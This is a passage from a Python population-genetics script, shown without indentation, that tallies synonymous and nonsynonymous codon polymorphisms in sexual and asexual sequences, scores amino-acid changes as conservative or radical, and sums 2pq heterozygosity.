sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + ';'.join(aaList) + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + ';'.join(aaList))
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + ';'.join(aaList) + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + ';'.join(aaList))
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
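# Unequal pairwise distances: the allele outside the most-divergent pair is
# treated as the intermediate, and each remaining allele is scored against it.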
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i == 0:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i == 0:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
sex_synS += 2
sex_sum2PQ_S += (2*twoPQ)
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\n')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + ';'.join(aaList) + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + ';'.join(aaList))
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
i += 1
sex_sum2PQ_S = str(sex_sum2PQ_S)
sex_sum2PQ_N = str(sex_sum2PQ_N)
sex_sum2PQ_C1 = str(sex_sum2PQ_C1)
sex_sum2PQ_C2 = str(sex_sum2PQ_C2)
sex_sum2PQ_C3 = str(sex_sum2PQ_C3)
sex_sum2PQ_C4 = str(sex_sum2PQ_C4)
sex_sum2PQ_C5 = str(sex_sum2PQ_C5)
sex_sum2PQ_C6 = str(sex_sum2PQ_C6)
sex_sum2PQ_C7 = str(sex_sum2PQ_C7)
sex_sum2PQ_R1 = str(sex_sum2PQ_R1)
sex_sum2PQ_R2 = str(sex_sum2PQ_R2)
sex_sum2PQ_R3 = str(sex_sum2PQ_R3)
sex_sum2PQ_R4 = str(sex_sum2PQ_R4)
sex_sum2PQ_R5 = str(sex_sum2PQ_R5)
sex_sum2PQ_R6 = str(sex_sum2PQ_R6)
sex_sum2PQ_R7 = str(sex_sum2PQ_R7)
sex_sum2PQ_meanC = str(sex_sum2PQ_meanC)
sex_sum2PQ_meanR = str(sex_sum2PQ_meanR)
sex_synS = str(sex_synS)
sex_nsynS = str(sex_nsynS)
sex_con1S = str(sex_con1S)
sex_con2S = str(sex_con2S)
sex_con3S = str(sex_con3S)
sex_con4S = str(sex_con4S)
sex_con5S = str(sex_con5S)
sex_con6S = str(sex_con6S)
sex_con7S = str(sex_con7S)
sex_meanConS = str(sex_meanConS)
sex_rad1S = str(sex_rad1S)
sex_rad2S = str(sex_rad2S)
sex_rad3S = str(sex_rad3S)
sex_rad4S = str(sex_rad4S)
sex_rad5S = str(sex_rad5S)
sex_rad6S = str(sex_rad6S)
sex_rad7S = str(sex_rad7S)
sex_meanRadS = str(sex_meanRadS)
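# Initialize the same per-criterion counters for the asexual individuals.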
asex_sum2PQ_S = 0
asex_sum2PQ_N = 0
asex_sum2PQ_C1 = 0
asex_sum2PQ_C2 = 0
asex_sum2PQ_C3 = 0
asex_sum2PQ_C4 = 0
asex_sum2PQ_C5 = 0
asex_sum2PQ_C6 = 0
asex_sum2PQ_C7 = 0
asex_sum2PQ_R1 = 0
asex_sum2PQ_R2 = 0
asex_sum2PQ_R3 = 0
asex_sum2PQ_R4 = 0
asex_sum2PQ_R5 = 0
asex_sum2PQ_R6 = 0
asex_sum2PQ_R7 = 0
asex_sum2PQ_meanC = 0
asex_sum2PQ_meanR = 0
asex_synS = 0
asex_nsynS = 0
asex_con1S = 0
asex_con2S = 0
asex_con3S = 0
asex_con4S = 0
asex_con5S = 0
asex_con6S = 0
asex_con7S = 0
asex_meanConS = 0
asex_rad1S = 0
asex_rad2S = 0
asex_rad3S = 0
asex_rad4S = 0
asex_rad5S = 0
asex_rad6S = 0
asex_rad7S = 0
asex_meanRadS = 0
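# Tally codon alleles at each position across the asexual sequences (asexList),
# as above for the sexual set.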
logfile.write('Asex polymorphisms\n')
sys.stdout.write('\n\nAsex Polymorphisms\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t2*pq\n')
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 2)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
asex_synS += 1
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
asex_nsynS += 1
asex_sum2PQ_N += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ) + '\n')
elif totalChanges == 2:
if len(currAlleleDict) == 3:
